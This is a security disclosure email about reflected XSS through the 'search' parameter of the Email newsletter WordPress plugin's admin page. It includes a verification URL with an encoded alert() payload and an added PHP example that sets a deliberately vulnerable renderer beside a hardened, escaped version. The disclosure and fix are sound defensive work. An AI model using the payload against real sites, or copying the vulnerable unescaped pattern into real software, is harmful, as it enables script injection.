Subject: Cross Site Scripting (XSS) in Email newsletter 20.13.6
Date: Mon, 10 Aug 2015 16:59:32 +0200

Hello,

Plugin: Email newsletter 20.13.6 https://wordpress.org/plugins/email-newsletter/

1. Cross Site Scripting (XSS) (page=view-subscriber)

The `search` query parameter is reflected into the view-subscriber admin page without escaping, so an authenticated administrator can inject arbitrary HTML/JavaScript (reflected XSS). The request carries no CSRF (nonce) protection, so the admin does not have to enter the payload deliberately: visiting a crafted URL is enough.

Method: GET
URL: http://localhost/wp-admin/admin.php?page=view-subscriber&search=[xss]
Vulnerable parameter: search

Example PHP call stack:
/email-newsletter/subscriber/view-subscriber-show.php:246

Verification:
http://localhost/wp-admin/admin.php?page=view-subscriber&search=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E
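The pattern behind this finding, and the fix a plugin author would apply, shown as an added example. This is not the plugin's code and not taken from the advisory: the function names `render_search_box_vulnerable`, `render_search_box_hardened`, `handle_view_subscriber_request` and the nonce action name `view_subscriber_search` are assumptions made for illustration. The WordPress helpers `esc_attr()`, `sanitize_text_field()`, `wp_unslash()` and `check_admin_referer()` are real; minimal stand-ins are defined so the file runs outside WordPress for the escaping check only.

```php
<?php
// Added example (not the plugin's code): the reflected-XSS pattern described
// in the advisory beside a hardened version. All function and nonce names are
// hypothetical.

// Stand-ins so the escaping behaviour can be exercised outside WordPress.
// Inside WordPress the real functions are used and these are skipped.
if ( ! function_exists( 'esc_attr' ) ) {
    function esc_attr( $text ) {
        return htmlspecialchars( $text, ENT_QUOTES | ENT_HTML5, 'UTF-8' );
    }
}
if ( ! function_exists( 'wp_unslash' ) ) {
    function wp_unslash( $value ) { return stripslashes( $value ); }
}
if ( ! function_exists( 'sanitize_text_field' ) ) {
    function sanitize_text_field( $str ) {
        // Strip tags and control characters; WordPress's version does more.
        return trim( preg_replace( '/[\x00-\x1f\x7f]/', '', strip_tags( $str ) ) );
    }
}
if ( ! function_exists( 'check_admin_referer' ) ) {
    // Stand-in: outside WordPress there is no session, so the nonce check is a no-op.
    function check_admin_referer( $action ) { return true; }
}

// VULNERABLE: the raw query value is concatenated into an attribute, so a
// value containing "> closes the attribute and the tag.
function render_search_box_vulnerable( $search ) {
    return '<input type="text" name="search" value="' . $search . '">';
}

// HARDENED: escape for the attribute context at output time.
function render_search_box_hardened( $search ) {
    return '<input type="text" name="search" value="' . esc_attr( $search ) . '">';
}

// Request handler for the hardened page: require a nonce (blocks the CSRF
// delivery described in the advisory), sanitize on input, escape on output.
function handle_view_subscriber_request() {
    check_admin_referer( 'view_subscriber_search' );   // hypothetical action name
    $search = isset( $_GET['search'] )
        ? sanitize_text_field( wp_unslash( $_GET['search'] ) )
        : '';
    return render_search_box_hardened( $search );
}

// Constructed sample input: the decoded payload from the verification URL.
$payload = '"><img src=x onerror=alert(1)>';

$vulnerable = render_search_box_vulnerable( $payload );
$hardened   = render_search_box_hardened( $payload );

echo "vulnerable: $vulnerable\n";   // contains a live <img onerror=...> element
echo "hardened:   $hardened\n";     // payload survives only as text inside value=""

// Defender's check: the hardened output must not contain an unescaped tag.
assert( strpos( $vulnerable, '<img' ) !== false );
assert( strpos( $hardened, '<img' ) === false );
assert( strpos( $hardened, '&quot;&gt;&lt;img' ) !== false );
```

The two renderers show why escaping must match the output context: `esc_attr()` encodes the double quote that the payload relies on to break out of `value=""`. The nonce check is a separate control; it does not stop an administrator from typing a payload into the search box, but it does stop the scenario the advisory describes, where a crafted link is opened by a logged-in administrator.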


--
Best regards,
Marcin Probola,